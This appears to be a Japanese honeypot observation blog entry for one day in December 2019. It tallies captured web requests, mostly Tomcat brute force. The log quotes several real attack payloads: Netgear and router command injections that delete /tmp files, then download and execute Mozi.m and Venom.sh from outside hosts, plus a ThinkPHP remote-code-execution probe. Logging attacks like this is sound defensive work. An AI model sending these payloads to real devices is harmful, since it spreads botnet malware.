WOWHoneypot観察(284日目)
2019/12/25(水)
トータルは8518件でした。
ハンティングログは以下です。
110.153.76[.]39 wget+hxxp[:]//172.36.29[.]223:38482/Mozi.m |
197.58.253[.]66 wget hxxp[:]//185.132.53[.]119/Venom.sh |
www.virustotal.com
www.virustotal.com
175.4.210[.]121 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.m |
件数 | 概要 | リクエスト |
---|---|---|
8457 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
33 | アクセス | GET / |
3 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
2 | 不正中継の調査 | GET hxxp[:]//baidu.com/robots.txt |
2 | Tomcatの調査 | GET /manager/text/list |
2 | ThinkPHPの脆弱性を狙った通信ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
1 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
1 | 不正中継の調査 | HEAD hxxp[:]//123.125.114.144/ |
1 | 不明 | HEAD /esps/ |
1 | 不正中継の調査 | GET hxxp[:]//www.123cha.com/ |
1 | DGN1000 Netgear ルータを狙うMirai亜種の攻撃 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp[:]//192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
1 | DGN1000 Netgear ルータを狙うMirai亜種の攻撃 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp[:]//172.36.29.223:38482/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
1 | ZmEUによるphpMyAdminのスキャン | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
1 | ZmEUによるphpMyAdminのスキャン | GET /pma/scripts/setup.php |
1 | ZmEUによるphpMyAdminのスキャン | GET /phpmyadmin/scripts/setup.php |
1 | ZmEUによるphpMyAdminのスキャン | GET /phpMyAdmin/scripts/setup.php |
1 | ZmEUによるphpMyAdminのスキャン | GET /myadmin/scripts/setup.php |
1 | ZmEUによるphpMyAdminのスキャン | GET /MyAdmin/scripts/setup.php |
1 | ルーターの脆弱性を狙った通信 | GET /login.cgi?cli=aa%20aa%27;wget%20hxxp[:]//185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ |
1 | 調査 | GET /index.html |
1 | Webshell設置の調査 | GET /external.php |
1 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
1 | 不正中継の試み | CONNECT www.ipip.net:443 |
1 | 不正中継の試み | CONNECT www.baidu.com:443 |
1 | 不正中継の試み | CONNECT cn.bing.com:443 |